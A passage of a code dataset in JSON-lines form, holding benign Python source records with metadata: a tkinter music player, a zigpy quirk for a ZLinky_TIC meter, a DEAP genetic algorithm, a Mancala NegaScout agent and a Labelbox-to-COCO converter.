1\r\n\r\n\r\n\r\n\r\ndef Play():\r\n try:\r\n pause\r\n\r\n except NameError:\r\n try:\r\n\r\n Stop()\r\n time.sleep(1)\r\n selectd_song = listbox.curselection()\r\n selectd_song = int(selectd_song[0])\r\n play_it = song_list[selectd_song]\r\n\r\n mixer.music.load(play_it)\r\n mixer.music.play()\r\n\r\n statusBar['text'] = \"Playing Music\" + ' ' + os.path.basename(play_it)\r\n\r\n song_details(play_it)\r\n\r\n except NameError:\r\n tkinter.messagebox.showerror(\"File not Found\", \"Kindly Upload Audio File\")\r\n\r\n else:\r\n mixer.music.unpause()\r\n statusBar['text'] = \"Music Resumed\"\r\n\r\n\r\n\r\n\r\n\r\ndef Pause():\r\n global pause\r\n pause = True\r\n mixer.music.pause()\r\n statusBar['text'] = \"Music Paused\"\r\n\r\n\r\n\r\ndef Stop():\r\n global stop\r\n\r\n mixer.music.stop()\r\n statusBar['text'] = \"Music Stopped\"\r\n\r\n\r\ndef volume(val):\r\n vol = float(val) / 10\r\n mixer.music.set_volume(vol)\r\n\r\n\r\nmute = False\r\n\r\n\r\ndef Mute():\r\n global mute\r\n\r\n if mute:\r\n mixer.music.set_volume(0.5)\r\n scale.set(5)\r\n statusBar['text'] = \"Playing Music\" + ' ' + os.path.basename(file_path)\r\n mute = False\r\n else:\r\n mixer.music.set_volume(0)\r\n scale.set(0)\r\n statusBar['text'] = \"Music Muted\"\r\n mute = True\r\n\r\n# Different buttons\r\nplay_btn = ttk.Button(root, image=play_img, command=Play)\r\nplay_btn.place(x=290, y=185)\r\n\r\npause_btn = ttk.Button(root, image=pause_img, command=Pause)\r\npause_btn.place(x=355, y=185)\r\n\r\nstop_btn = ttk.Button(root, image=stop_img, command=Stop)\r\nstop_btn.place(x=420, y=185)\r\n\r\nadd_song_btn = ttk.Button(root, text=\"Add song\", command=Browse_file)\r\nadd_song_btn.place(x=52, y=325)\r\n\r\ndef del_song():\r\n selectd_song = listbox.curselection()\r\n selectd_song = int(selectd_song[0])\r\n listbox.delete(selectd_song)\r\n song_list.pop(selectd_song)\r\n\r\n\r\n\r\n\r\n\r\n\r\ndel_song_btn = ttk.Button(root, text=\"Delete song\", command=del_song)\r\ndel_song_btn.place(x=148, y=325)\r\n\r\n\r\nspeaker = ttk.Button(root, image=speaker_img, command=Mute).place(x=305, y=265)\r\n\r\nscale = ttk.Scale(root, from_=0, to=10, orient=HORIZONTAL, command=volume)\r\nscale.place(x=355, y=272)\r\nscale.set(5)\r\n\r\nstatusBar = ttk.Label(root, font=('times new roman', 12, 'bold'), text=\"Welcome to Python-Music player\", anchor=W)\r\nstatusBar.pack(side=BOTTOM, fill=X)\r\n\r\n\r\ndef close_window():\r\n Stop()\r\n root.destroy()\r\n\r\nsubMenuss.add_command(label=\"Exit\", command = close_window)\r\nroot.protocol(\"WM_DELETE_WINDOW\", close_window)\r\nroot.mainloop()", "repo_name": "SarfrazAHd/BaseRepo", "sub_path": "Python/Python_Project/MUSIC_PLAYER/Music_Player.py", "file_name": "Music_Player.py", "file_ext": "py", "file_size_in_byte": 5337, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.mixer.init", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 14, "usage_type": "name"}, {"api_name": "ttkthemes.themed_tk.ThemedTk", "line_number": 16, "usage_type": "call"}, {"api_name": "ttkthemes.themed_tk", "line_number": 16, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 27, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 27, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 30, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 30, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 33, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 37, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 37, "usage_type": "name"}, {"api_name": "tkinter.filedialog.askopenfilename", "line_number": 56, "usage_type": "call"}, {"api_name": "tkinter.filedialog", "line_number": 56, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.splitext", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "mutagen.mp3.MP3", "line_number": 91, "usage_type": "call"}, {"api_name": "pygame.mixer.Sound", "line_number": 95, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 95, "usage_type": "name"}, {"api_name": "threading.Thread", "line_number": 109, "usage_type": "call"}, {"api_name": "pygame.mixer.music.get_busy", "line_number": 118, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 118, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 118, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 125, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 139, "usage_type": "call"}, {"api_name": "pygame.mixer.music.load", "line_number": 144, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 144, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 144, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 145, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 145, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 145, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "attribute"}, {"api_name": "tkinter.messagebox.showerror", "line_number": 152, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 152, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.unpause", "line_number": 155, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 155, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 155, "usage_type": "name"}, {"api_name": "pygame.mixer.music.pause", "line_number": 165, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 165, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 165, "usage_type": "name"}, {"api_name": "pygame.mixer.music.stop", "line_number": 173, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 173, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 173, "usage_type": "name"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 179, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 179, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 179, "usage_type": "name"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 189, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 189, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 189, "usage_type": "name"}, {"api_name": "os.path.basename", "line_number": 191, "usage_type": "call"}, {"api_name": "os.path", "line_number": 191, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.set_volume", "line_number": 194, "usage_type": "call"}, {"api_name": "pygame.mixer.music", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.mixer", "line_number": 194, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 200, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 200, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 203, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 203, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 206, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 206, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 209, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 209, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 223, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 223, "usage_type": "name"}, {"api_name": "tkinter.ttk.Button", "line_number": 227, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 227, "usage_type": "name"}, {"api_name": "tkinter.ttk.Scale", "line_number": 229, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 229, "usage_type": "name"}, {"api_name": "tkinter.ttk.Label", "line_number": 233, "usage_type": "call"}, {"api_name": "tkinter.ttk", "line_number": 233, "usage_type": "name"}]}
+{"seq_id": "23938456544", "text": "\"\"\"Quirk for ZLinky_TIC.\"\"\"\nfrom zigpy.profiles import zha\nfrom zigpy.quirks import CustomCluster, CustomDevice\nfrom zigpy.zcl.clusters.general import Basic, GreenPowerProxy, Identify, Ota\nfrom zigpy.zcl.clusters.homeautomation import ElectricalMeasurement, MeterIdentification\nfrom zigpy.zcl.clusters.smartenergy import Metering\n\nfrom zhaquirks.const import (\n DEVICE_TYPE,\n ENDPOINTS,\n INPUT_CLUSTERS,\n MODELS_INFO,\n OUTPUT_CLUSTERS,\n PROFILE_ID,\n)\nfrom zhaquirks.lixee import LIXEE\n\n\nclass ZLinkyTICMetering(CustomCluster, Metering):\n \"\"\"ZLinky_TIC custom metering cluster.\"\"\"\n\n # ZLinky_TIC reports current_summ_delivered in Wh\n # Home Assistant expects kWh (1kWh = 1000 Wh)\n MULTIPLIER = 0x0301\n DIVISOR = 0x0302\n _CONSTANT_ATTRIBUTES = {MULTIPLIER: 1, DIVISOR: 1000}\n\n\nclass ZLinkyTIC(CustomDevice):\n \"\"\"ZLinky_TIC from LiXee.\"\"\"\n\n signature = {\n MODELS_INFO: [(LIXEE, \"ZLinky_TIC\")],\n ENDPOINTS: {\n 1: {\n PROFILE_ID: zha.PROFILE_ID,\n DEVICE_TYPE: zha.DeviceType.METER_INTERFACE,\n INPUT_CLUSTERS: [\n Basic.cluster_id,\n Identify.cluster_id,\n Metering.cluster_id,\n MeterIdentification.cluster_id,\n ElectricalMeasurement.cluster_id,\n 0xFF66, # Manufacturer Specific\n ],\n OUTPUT_CLUSTERS: [Ota.cluster_id],\n },\n 242: {\n PROFILE_ID: 41440,\n DEVICE_TYPE: 0x0061,\n INPUT_CLUSTERS: [GreenPowerProxy.cluster_id],\n OUTPUT_CLUSTERS: [GreenPowerProxy.cluster_id],\n },\n },\n }\n replacement = {\n ENDPOINTS: {\n 1: {\n PROFILE_ID: zha.PROFILE_ID,\n DEVICE_TYPE: zha.DeviceType.METER_INTERFACE,\n INPUT_CLUSTERS: [\n Basic.cluster_id,\n Identify.cluster_id,\n ZLinkyTICMetering,\n MeterIdentification.cluster_id,\n ElectricalMeasurement.cluster_id,\n 0xFF66, # Manufacturer Specific\n ],\n OUTPUT_CLUSTERS: [Ota.cluster_id],\n },\n 242: {\n PROFILE_ID: 41440,\n DEVICE_TYPE: 0x0061,\n INPUT_CLUSTERS: [GreenPowerProxy.cluster_id],\n OUTPUT_CLUSTERS: [GreenPowerProxy.cluster_id],\n },\n },\n }\n", "repo_name": "Datakg/tuya", "sub_path": "zhaquirks/lixee/zlinky.py", "file_name": "zlinky.py", "file_ext": "py", "file_size_in_byte": 2535, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "zigpy.quirks.CustomCluster", "line_number": 19, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.smartenergy.Metering", "line_number": 19, "usage_type": "name"}, {"api_name": "zigpy.quirks.CustomDevice", "line_number": 29, "usage_type": "name"}, {"api_name": "zhaquirks.const.MODELS_INFO", "line_number": 33, "usage_type": "name"}, {"api_name": "zhaquirks.const.ENDPOINTS", "line_number": 34, "usage_type": "name"}, {"api_name": "zhaquirks.lixee.LIXEE", "line_number": 33, "usage_type": "name"}, {"api_name": "zhaquirks.const.PROFILE_ID", "line_number": 36, "usage_type": "name"}, {"api_name": "zhaquirks.const.DEVICE_TYPE", "line_number": 37, "usage_type": "name"}, {"api_name": "zhaquirks.const.INPUT_CLUSTERS", "line_number": 38, "usage_type": "name"}, {"api_name": "zhaquirks.const.OUTPUT_CLUSTERS", "line_number": 46, "usage_type": "name"}, {"api_name": "zigpy.profiles.zha.PROFILE_ID", "line_number": 36, "usage_type": "attribute"}, {"api_name": "zigpy.profiles.zha", "line_number": 36, "usage_type": "name"}, {"api_name": "zigpy.profiles.zha.DeviceType", "line_number": 37, "usage_type": "attribute"}, {"api_name": "zigpy.profiles.zha", "line_number": 37, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Basic.cluster_id", "line_number": 39, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Basic", "line_number": 39, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Identify.cluster_id", "line_number": 40, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Identify", "line_number": 40, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.smartenergy.Metering.cluster_id", "line_number": 41, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.smartenergy.Metering", "line_number": 41, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.homeautomation.MeterIdentification.cluster_id", "line_number": 42, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.homeautomation.MeterIdentification", "line_number": 42, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.homeautomation.ElectricalMeasurement.cluster_id", "line_number": 43, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.homeautomation.ElectricalMeasurement", "line_number": 43, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Ota.cluster_id", "line_number": 46, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Ota", "line_number": 46, "usage_type": "name"}, {"api_name": "zhaquirks.const.PROFILE_ID", "line_number": 49, "usage_type": "name"}, {"api_name": "zhaquirks.const.DEVICE_TYPE", "line_number": 50, "usage_type": "name"}, {"api_name": "zhaquirks.const.INPUT_CLUSTERS", "line_number": 51, "usage_type": "name"}, {"api_name": "zhaquirks.const.OUTPUT_CLUSTERS", "line_number": 52, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy.cluster_id", "line_number": 51, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy", "line_number": 51, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy.cluster_id", "line_number": 52, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy", "line_number": 52, "usage_type": "name"}, {"api_name": "zhaquirks.const.ENDPOINTS", "line_number": 57, "usage_type": "name"}, {"api_name": "zhaquirks.const.PROFILE_ID", "line_number": 59, "usage_type": "name"}, {"api_name": "zhaquirks.const.DEVICE_TYPE", "line_number": 60, "usage_type": "name"}, {"api_name": "zhaquirks.const.INPUT_CLUSTERS", "line_number": 61, "usage_type": "name"}, {"api_name": "zhaquirks.const.OUTPUT_CLUSTERS", "line_number": 69, "usage_type": "name"}, {"api_name": "zigpy.profiles.zha.PROFILE_ID", "line_number": 59, "usage_type": "attribute"}, {"api_name": "zigpy.profiles.zha", "line_number": 59, "usage_type": "name"}, {"api_name": "zigpy.profiles.zha.DeviceType", "line_number": 60, "usage_type": "attribute"}, {"api_name": "zigpy.profiles.zha", "line_number": 60, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Basic.cluster_id", "line_number": 62, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Basic", "line_number": 62, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Identify.cluster_id", "line_number": 63, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Identify", "line_number": 63, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.homeautomation.MeterIdentification.cluster_id", "line_number": 65, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.homeautomation.MeterIdentification", "line_number": 65, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.homeautomation.ElectricalMeasurement.cluster_id", "line_number": 66, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.homeautomation.ElectricalMeasurement", "line_number": 66, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.Ota.cluster_id", "line_number": 69, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.Ota", "line_number": 69, "usage_type": "name"}, {"api_name": "zhaquirks.const.PROFILE_ID", "line_number": 72, "usage_type": "name"}, {"api_name": "zhaquirks.const.DEVICE_TYPE", "line_number": 73, "usage_type": "name"}, {"api_name": "zhaquirks.const.INPUT_CLUSTERS", "line_number": 74, "usage_type": "name"}, {"api_name": "zhaquirks.const.OUTPUT_CLUSTERS", "line_number": 75, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy.cluster_id", "line_number": 74, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy", "line_number": 74, "usage_type": "name"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy.cluster_id", "line_number": 75, "usage_type": "attribute"}, {"api_name": "zigpy.zcl.clusters.general.GreenPowerProxy", "line_number": 75, "usage_type": "name"}]}
+{"seq_id": "1856604317", "text": "\"\"\"\nThe equation: 1027 * x + 712 * y = 1\nD(x) = [-1 500; 1 500]\nD(y) = [-1 500; 1 500]\n\"\"\"\nimport random\nimport operator\n\nfrom deap import tools, base, creator, algorithms\n\nMIN, MAX = -1500, 1500\nSOLUTION = [-165, 238]\nVARIABLES = len(SOLUTION)\n\nMUT_MIN, MUT_MAX = -10, 10\nNGEN, IND_SIZE, CXPB, MUTPB, TRN_SIZE = 100, 50, 0.5, 0.5, 100\nHALL_SIZE = 10\nDEFAULT_MAIN_ARGS = NGEN, IND_SIZE, CXPB, MUTPB\n\nBEST_INSTANCE_MSG = 'Best instance:'\nNO_SOLUTION_MSG = 'No solution in integers. Distance is:'\n\n\ndef fitness(instance):\n x, y = instance\n return abs(1027 * x + 712 * y - 1),\n\n\ndef spawn_instance():\n return random.randint(MIN, MAX), random.randint(MIN, MAX)\n\n\ndef mutate(instance, mutpb):\n if random.random() <= mutpb:\n index = random.randint(0, len(instance) - 1)\n instance[index] += random.randint(MUT_MIN, MUT_MAX)\n return instance,\n return instance,\n\n\ndef get_best_result(population):\n if isinstance(population[0], list):\n fitness_values = list(map(fitness, population))\n index = fitness_values.index(min(fitness_values))\n return population[index]\n else:\n return min(population, key=operator.attrgetter('fitness'))\n\n\ndef terminate(population):\n if fitness(get_best_result(population)) == (0, ):\n raise StopIteration\n return False\n\n\ndef distance_from_best_result(population):\n result = get_best_result(population)\n return fitness(result)[0]\n\n\ndef output(best_instance):\n print(BEST_INSTANCE_MSG, best_instance)\n distance = fitness(best_instance)\n if distance:\n print(NO_SOLUTION_MSG, distance)\n\n\ndef setup(mutpb):\n creator.create(\"FitnessMin\", base.Fitness, weights=(-1,))\n creator.create(\"Individual\", list, fitness=creator.FitnessMin)\n toolbox = base.Toolbox()\n toolbox.register(\"attribute\", random.randint, MIN, MAX)\n toolbox.register(\"individual\", tools.initRepeat, creator.Individual,\n toolbox.attribute, n=VARIABLES)\n toolbox.register(\"population\", tools.initRepeat, list, toolbox.individual)\n toolbox.register(\"mate\", tools.cxOnePoint)\n toolbox.register(\"mutate\", mutate, mutpb=mutpb)\n toolbox.register(\"select\", tools.selBest)\n toolbox.register(\"evaluate\", fitness)\n return toolbox\n\n\ndef main(ngen, ind_size, cxpb, mutpb):\n toolbox = setup(mutpb)\n population = toolbox.population(n=ind_size)\n stats = tools.Statistics()\n stats.register(\"best_instance_of_population\", get_best_result)\n stats.register(\"distance\", distance_from_best_result)\n stats.register(\"terminate\", terminate)\n halloffame = tools.HallOfFame(HALL_SIZE)\n try:\n algorithms.eaSimple(population, toolbox, cxpb, mutpb, ngen,\n stats=stats, halloffame=halloffame)\n except StopIteration:\n pass\n finally:\n best_instance = halloffame[0]\n output(best_instance)\n return best_instance\n\n\nif __name__ == '__main__':\n main(*DEFAULT_MAIN_ARGS)", "repo_name": "ViachKakovskyi/ga-example-diophantine", "sub_path": "diophantine.py", "file_name": "diophantine.py", "file_ext": "py", "file_size_in_byte": 2960, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "random.randint", "line_number": 30, "usage_type": "call"}, {"api_name": "random.random", "line_number": 34, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 35, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 36, "usage_type": "call"}, {"api_name": "operator.attrgetter", "line_number": 47, "usage_type": "call"}, {"api_name": "deap.creator.create", "line_number": 69, "usage_type": "call"}, {"api_name": "deap.creator", "line_number": 69, "usage_type": "name"}, {"api_name": "deap.base.Fitness", "line_number": 69, "usage_type": "attribute"}, {"api_name": "deap.base", "line_number": 69, "usage_type": "name"}, {"api_name": "deap.creator.create", "line_number": 70, "usage_type": "call"}, {"api_name": "deap.creator", "line_number": 70, "usage_type": "name"}, {"api_name": "deap.creator.FitnessMin", "line_number": 70, "usage_type": "attribute"}, {"api_name": "deap.base.Toolbox", "line_number": 71, "usage_type": "call"}, {"api_name": "deap.base", "line_number": 71, "usage_type": "name"}, {"api_name": "random.randint", "line_number": 72, "usage_type": "attribute"}, {"api_name": "deap.tools.initRepeat", "line_number": 73, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 73, "usage_type": "name"}, {"api_name": "deap.creator.Individual", "line_number": 73, "usage_type": "attribute"}, {"api_name": "deap.creator", "line_number": 73, "usage_type": "name"}, {"api_name": "deap.tools.initRepeat", "line_number": 75, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 75, "usage_type": "name"}, {"api_name": "deap.tools.cxOnePoint", "line_number": 76, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 76, "usage_type": "name"}, {"api_name": "deap.tools.selBest", "line_number": 78, "usage_type": "attribute"}, {"api_name": "deap.tools", "line_number": 78, "usage_type": "name"}, {"api_name": "deap.tools.Statistics", "line_number": 86, "usage_type": "call"}, {"api_name": "deap.tools", "line_number": 86, "usage_type": "name"}, {"api_name": "deap.tools.HallOfFame", "line_number": 90, "usage_type": "call"}, {"api_name": "deap.tools", "line_number": 90, "usage_type": "name"}, {"api_name": "deap.algorithms.eaSimple", "line_number": 92, "usage_type": "call"}, {"api_name": "deap.algorithms", "line_number": 92, "usage_type": "name"}]}
+{"seq_id": "29580198932", "text": "import random\nfrom typing import List, Union\n\nimport numpy as np\n\nfrom mancala.agents.base import BaseAgent\nfrom mancala.state.base import BaseState\n\n\ndef negamax(state: BaseState, depth: int, maximizing_player: int) -> float:\n color = 1 if maximizing_player == state.turn else -1\n if depth == 0 or state._done:\n return color * (state.scores[state.turn] - state.scores[1 - state.turn])\n legal_actions = state.legal_actions(state.turn)\n if legal_actions is None:\n child = state.clone().proceed_action(None)\n return -negamax(child, depth - 1, maximizing_player)\n value = -float(\"inf\")\n for act in legal_actions:\n child = state.clone().proceed_action(act)\n value = max(value, negamax(child, depth - 1, maximizing_player))\n return -value\n\n\ndef negascout(state: BaseState, depth: int, maximizing_player: int):\n color = 1 if maximizing_player == state.turn else -1\n return color * pvs(state, depth, -float(\"inf\"), float(\"inf\"), 1)\n\n\ndef pvs(state: BaseState, depth: int, alpha: float, beta: float, color: int) -> float:\n \"\"\"\n Principal variation search (PVS), also known as NegaScout\n alpha: minimum score that the maximizing player is assured of\n beta: maximum score that the minimizing player is assured of\n \"\"\"\n assert color in [-1, 1], color\n # Ref: https://en.wikipedia.org/wiki/Principal_variation_search\n if depth == 0 or state._done:\n return state.scores[state.turn] - state.scores[1 - state.turn]\n\n legal_actions = state.legal_actions(state.turn)\n if legal_actions is None:\n clone = state.clone().proceed_action(None)\n return -pvs(clone, depth - 1, -beta, -alpha, -color)\n sorted_actions = legal_actions.copy()\n # The search order should be small to large idx, since closer to point pocket is more important\n for act in legal_actions:\n if state._can_continue_on_point(act):\n sorted_actions.insert(0, sorted_actions.pop(sorted_actions.index(act)))\n\n for i, act in enumerate(sorted_actions):\n child = state.clone().proceed_action(act)\n if i == 0:\n score = -pvs(child, depth - 1, -beta, -alpha, -color)\n else:\n score = -pvs(child, depth - 1, -alpha - 0.01, -alpha, -color)\n if alpha < score < beta:\n score = -pvs(child, depth - 1, -beta, -score, -color)\n alpha = max(alpha, score)\n if alpha >= beta:\n break\n return alpha\n\n\nclass NegaScoutAgent(BaseAgent):\n \"\"\"\n Agent based on mini-max algorithm\n \"\"\"\n\n def __init__(self, id: int, depth: int = 2):\n self.deterministic = False\n self._seed = 42\n self._depth = depth\n self.set_id(id)\n\n def policy(self, state: BaseState) -> Union[int, None]:\n assert self.id == state.turn, self\n legal_actions = state.legal_actions(state.turn)\n if legal_actions is None:\n return None\n action_rewards = [\n negascout(state.clone().proceed_action(a), self._depth, self.id)\n for a in legal_actions\n ]\n # print(legal_actions)\n # print(action_rewards)\n max_reward = max(action_rewards)\n max_actions = [\n a for a, r in zip(legal_actions, action_rewards) if r == max_reward\n ]\n if self.deterministic:\n random.seed(self._seed)\n return random.choice(max_actions)", "repo_name": "qqpann/Mancala", "sub_path": "mancala/agents/negascout.py", "file_name": "negascout.py", "file_ext": "py", "file_size_in_byte": 3405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "52", "api": [{"api_name": "mancala.state.base.BaseState", "line_number": 10, "usage_type": "name"}, {"api_name": "mancala.state.base.BaseState", "line_number": 25, "usage_type": "name"}, {"api_name": "mancala.state.base.BaseState", "line_number": 30, "usage_type": "name"}, {"api_name": "mancala.agents.base.BaseAgent", "line_number": 65, "usage_type": "name"}, {"api_name": "mancala.state.base.BaseState", "line_number": 76, "usage_type": "name"}, {"api_name": "random.seed", "line_number": 92, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 93, "usage_type": "call"}, {"api_name": "typing.Union", "line_number": 76, "usage_type": "name"}]}
+{"seq_id": "2832326494", "text": "import json\nimport numpy as np\nfrom PIL import Image, ImageDraw\n\nprint('Start program')\n\nimg_shape = [1920, 1080] #height, width\nlabel_names = ['Wrinkle_critical', 'Wrinkle_nonCritical'] #Same as 'title' in JSON file\njson_name = 'labels.json'\n\nprint('Open label JSON')\n\nwith open(json_name) as json_file:\n labelbox_data = json.load(json_file)\n\nimages = []\nannotations = []\n\nimg_id = 0\nann_id = 0\n\ndef getbbox(points):\n global img_shape\n polygons = points\n mask = polygons_to_mask(img_shape, polygons)\n return mask2box(mask)\n\ndef mask2box(mask):\n\n index = np.argwhere(mask == 1)\n rows = index[:, 0]\n clos = index[:, 1]\n\n left_top_r = np.min(rows) # y\n left_top_c = np.min(clos) # x\n\n right_bottom_r = np.max(rows)\n right_bottom_c = np.max(clos)\n\n return [\n left_top_c,\n left_top_r,\n right_bottom_c - left_top_c,\n right_bottom_r - left_top_r,\n ]\n\ndef polygons_to_mask(img_shape, polygons):\n mask = np.zeros(img_shape, dtype=np.uint8)\n mask = Image.fromarray(mask)\n xy = list(map(tuple, polygons))\n ImageDraw.Draw(mask).polygon(xy=xy, outline=1, fill=1)\n mask = np.array(mask, dtype=bool)\n return mask\n\nprint('Create info from JSON')\n\nfor data_row in labelbox_data:\n\n image = {}\n image['id'] = img_id\n image['license'] = 1\n image['file_name'] = data_row['External ID']\n image['height'] = img_shape[0]\n image['width'] = img_shape[1]\n image['date_captured'] = data_row['Created At']\n\n images.append(image)\n\n #Append polygons\n for poly in data_row['Label']['objects']:\n annotation = {}\n\n points = []\n seg = []\n for pnt in poly['polygon']:\n points.append([pnt['x'], pnt['y']])\n seg.append(pnt['x'])\n seg.append(pnt['y'])\n\n contour = np.array(points)\n x = contour[:, 0]\n y = contour[:, 1]\n \n area = 0.5 * np.abs(np.dot(x, np.roll(y, 1)) - np.dot(y, np.roll(x, 1)))\n\n annotation[\"segmentation\"] = [seg]\n annotation[\"iscrowd\"] = 0\n annotation[\"area\"] = area\n annotation[\"image_id\"] = img_id\n\n annotation[\"bbox\"] = list(map(float, getbbox(points)))\n\n cat_id = label_names.index(poly['title'])\n\n annotation[\"category_id\"] = cat_id \n annotation[\"id\"] = ann_id\n\n annotations.append(annotation)\n ann_id +=1\n\n img_id+=1\n\nprint('Create new JSON structure')\n\ncoco_struc= {\n 'info': {\n 'year': '2022', \n 'version': '1',\n \"description\": \"Translated from labelbox\",\n \"contributor\": \"User\",\n }, \n 'licenses': [{\n \"id\": 1,\n \"url\": \"https://creativecommons.org/publicdomain/zero/1.0/\",\n \"name\": \"Public Domain\"\n }],\n \"categories\": [\n {\n \"id\": 0,\n \"name\": \"wrinkle_critical\",\n \"supercategory\": \"none\"\n },\n {\n \"id\": 1,\n \"name\": \"wrinkle_nonCritical\",\n \"supercategory\": \"none\"\n }],\n 'images': images,\n 'annotations': annotations\n }\n\nprint('Export JSON')\n\nwith open('labels_coco.json', 'w') as outfile:\n json.dump(coco_struc, outfile)\n\nprint('coco JSON exported')", "repo_name": "SamRutten2000/Labelbox_converter", "sub_path": "labelbox2coco.py", "file_name": "labelbox2coco.py", "file_ext": "py", "file_size_in_byte": 3280, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.argwhere", "line_number": 30, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.min", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 48, "usage_type": "call"}, 